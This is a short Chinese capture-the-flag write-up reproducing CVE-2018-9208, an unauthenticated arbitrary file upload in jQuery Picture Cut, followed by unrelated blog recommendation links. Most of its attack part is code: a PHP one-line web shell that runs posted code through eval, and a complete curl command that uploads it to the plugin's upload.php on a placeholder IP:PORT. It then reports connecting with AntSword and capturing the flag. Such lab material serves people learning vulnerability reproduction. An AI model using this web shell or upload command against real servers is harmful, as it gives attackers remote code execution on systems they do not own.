jquery-picture-cut 任意文件上传(CVE-2018-9208)

目录

1、漏洞描述

2、访问ip:port

3、一句话木马:exploit.php

4、上传一句话木马

5、中国蚁剑连接成功

6、拿到flag


1、漏洞描述

jQuery是一个快速、简洁的JavaScript框架,是继Prototype之后又一个优秀的JavaScript代码库(框架)于2006年1月由John Resig发布。 jQuery Picture Cut <= v1.1Beta 中未经身份验证的任意文件上传漏洞 复现参考链接:http://www.vapidlabs.com/advisory.php?v=207

2、访问ip:port

3、一句话木马:exploit.php

复制代码
<?php @eval($_POST['a']);?>

4、上传一句话木马

复制代码
curl -F "inputOfFile=file" -F "request=upload" -F "enableResize=0" -F "minimumWidthToResize=0" -F "minimumHeightToResize=0" -F "folderOnServer=/" -F "imageNameRandom=1" -F "maximumSize=10000" -F "enableMaximumSize=0" -F "file=@exploit.php" http://IP:PORT/jquery-picture-cut/src/php/upload.php

5、中国蚁剑连接成功

6、拿到flag

相关推荐
前端小巷子1 分钟前
深入 npm 模块安装机制
前端·javascript·面试
qq_430908571 小时前
网络安全-机遇与挑战
安全
希望奇迹很安静1 小时前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
深职第一突破口喜羊羊1 小时前
记一次electron开发插件市场遇到的问题
javascript·electron
cypking1 小时前
electron中IPC 渲染进程与主进程通信方法解析
前端·javascript·electron
西陵1 小时前
Nx带来极致的前端开发体验——借助playground开发提效
前端·javascript·架构
henysugar1 小时前
便捷删除Android开发中XML中重复字符串资源的一个办法
android·xml
江城开朗的豌豆2 小时前
Element UI动态组件样式修改小妙招,轻松拿捏!
前端·javascript·vue.js
aqi002 小时前
FFmpeg开发笔记(七十八)采用Kotlin+Compose的NextPlayer播放器
android·ffmpeg·音视频·直播·流媒体
float_六七2 小时前
JavaScript:现代Web开发的核心动力
开发语言·前端·javascript